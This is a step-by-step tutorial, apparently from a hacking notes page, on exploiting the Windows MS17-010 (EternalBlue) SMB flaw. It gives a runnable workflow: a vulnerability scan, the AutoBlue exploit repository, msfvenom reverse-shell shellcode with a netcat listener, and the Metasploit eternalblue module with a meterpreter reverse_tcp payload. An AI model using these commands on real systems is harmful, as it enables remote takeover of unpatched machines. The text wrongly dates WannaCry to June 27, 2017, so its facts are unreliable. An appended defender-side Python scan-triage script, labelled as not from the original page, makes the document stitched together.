🧨Exploiting Windows MS17-010 SMB Vulnerability (EternalBlue)

MS17-010 EternalBlue Exploit

  • EternalBlue (MS17-010/CVE-2017-0144) is the name given to a collection of Windows vulnerabilities and exploits that allow attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of.

  • The EternalBlue exploit was developed by the NSA (National Security Agency) to take advantage of the MS17-010 vulnerability and was leaked to the public by a hacker group called the Shadow Brokers in 2017.

  • The EternalBlue exploit takes advantage of a vulnerability in the Windows SMBv1 protocol that allows attackers to send specially crafted packets that consequently facilitate the execution of arbitrary commands.

  • The EternalBlue exploit was used in the WannaCry ransomware attack on June 27, 2017 to exploit other Windows systems across networks with the objective of spreading the ransomware to as many systems as possible.

  • This vulnerability affects multiple versions of Windows:

    • Windows Vista

    • Windows 7

    • Windows Server 2008

    • Windows 8.1

    • Windows Server 2012

    • Windows 10

    • Windows Server 2016

  • Microsoft released a patch for the vulnerability in March 2017; however, many users and companies have still not patched their systems.

  • The EternalBlue exploit has an MSF auxiliary module that can be used to check whether a target system is vulnerable, and an exploit module that can be used to exploit the vulnerability on unpatched systems.

  • The EternalBlue exploit module can be used to exploit vulnerable Windows systems and consequently provide us with a privileged meterpreter session on the target system.

  • In addition to MSF modules, we can also manually exploit the vulnerability by utilizing publicly available exploit code.

Attack Flow for the Windows MS17-010 SMB Vulnerability (EternalBlue)

1. Determine Vulnerability

Objective: Identify whether the target system is vulnerable to EternalBlue.

Command:

nmap -sV -O --script=smb-vuln-ms17-010 <Target_IP>

Description: Scan the target system with the smb-vuln-ms17-010 NSE script (alongside version and OS detection) to check for the MS17-010 vulnerability.

2. Clone the Exploit Repository

Objective: Download the necessary exploit code for MS17-010.

Command:

git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010

Description: Clone the AutoBlue-MS17-010 repository and navigate to its directory.

3. Install Prerequisites

Objective: Install the required dependencies for the exploit tool.

Command:

sudo pip install -r requirements.txt

Description: Use the provided requirements.txt file to install necessary Python packages.

4. Generate the Shell Payload

Objective: Create a reverse shell payload for exploitation.

Command:

cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh

Description: Navigate to the shellcode folder, make shell_prep.sh executable, and run it to generate the shell payload using msfvenom.

Inside shell_prep.sh:

  • Set LHOST and LPORT values.

  • Generate a regular cmd shell.

  • Choose to create a stageless payload.

5. Set Up NetCat Listener

Objective: Prepare to receive the reverse shell connection.

Command:

nc -nvlp <LPORT>

Description: Start a NetCat listener on the specified port to capture the reverse shell.

6. Execute the Exploit

Objective: Run the EternalBlue exploit code to establish a reverse shell.

Command:

cd ..
chmod +x eternalblue_exploit7.py
python eternalblue_exploit7.py <Target_IP> shellcode/sc_x64

Description: Navigate back to the main repository folder, make the exploit script executable, and run it to exploit the target and establish a reverse shell connection.

7. Alternative Method Using Metasploit

Objective: Use Metasploit to exploit the MS17-010 vulnerability.

Command:

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST <Target_IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <Your_IP>
set LPORT <Your_Port>
exploit

Description: Use the ms17_010_eternalblue module in Metasploit to exploit the target system and establish a Meterpreter session.
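As an added defender-side example (not code from the original page or from the AutoBlue project): a Python script that parses the XML written by the step 1 scan when run with `-oX scan.xml`, and buckets hosts by the verdict of the smb-vuln-ms17-010 script so the flagged ones can be queued for the MS17-010 patch or isolated first. The sample XML is constructed, and the assumed element layout (a `script` element with that id, a `table` keyed by CVE-2017-0143, and an `elem` with key `state`) follows nmap's vulns-library output format.

```python
import xml.etree.ElementTree as ET

SCRIPT_ID = "smb-vuln-ms17-010"

# Constructed sample (not a real scan): a flagged host, a not-vulnerable host,
# a host where the script errored (no state), and a host it never ran against.
SAMPLE_XML = """<nmaprun>
 <host><address addr="192.0.2.10" addrtype="ipv4"/><hostscript>
  <script id="smb-vuln-ms17-010" output="VULNERABLE"><table key="CVE-2017-0143">
   <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
   <elem key="state">VULNERABLE</elem><elem key="risk_factor">HIGH</elem>
  </table></script></hostscript></host>
 <host><address addr="192.0.2.11" addrtype="ipv4"/><hostscript>
  <script id="smb-vuln-ms17-010" output="NOT VULNERABLE"><table key="CVE-2017-0143">
   <elem key="state">NOT VULNERABLE</elem></table></script></hostscript></host>
 <host><address addr="192.0.2.12" addrtype="ipv4"/><hostscript>
  <script id="smb-vuln-ms17-010" output="ERROR: Script execution failed"/>
 </hostscript></host>
 <host><address addr="192.0.2.13" addrtype="ipv4"/></host>
</nmaprun>
"""

def host_address(host):
    """Return the IPv4 address recorded for an nmap <host> element."""
    addr = host.find("address[@addrtype='ipv4']")
    return addr.get("addr") if addr is not None else None

def ms17_010_state(host):
    """Return (script_found, state); state is None when no verdict was recorded."""
    for script in host.iter("script"):
        if script.get("id") == SCRIPT_ID:
            elem = script.find("./table/elem[@key='state']")
            state = elem.text.strip() if elem is not None and elem.text else None
            return True, state
    return False, None

def triage(xml_text):
    """Bucket hosts into 'vulnerable', 'not_flagged' and 'error' lists."""
    result = {"vulnerable": [], "not_flagged": [], "error": []}
    for host in ET.fromstring(xml_text).findall("host"):
        ip = host_address(host)
        found, state = ms17_010_state(host)
        if found and state is None:
            result["error"].append(ip)        # script ran but gave no verdict: rescan
        elif state and (state.startswith("VULNERABLE") or state == "LIKELY VULNERABLE"):
            result["vulnerable"].append(ip)   # apply MS17-010 / disable SMBv1 first
        else:
            result["not_flagged"].append(ip)  # reported not vulnerable, or not tested
    return result
```

Call `triage(open("scan.xml").read())` on a real scan file; hosts in the error bucket need a rescan or a direct check, since an NSE error is not evidence of safety.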

Hacker's Mantra: If hackers, if anyone committing a criminal act, wants to reduce their risk, they obviously don't involve anybody else. The greater the circle of people that know what you're doing, the higher the risk. - Kevin Mitnick
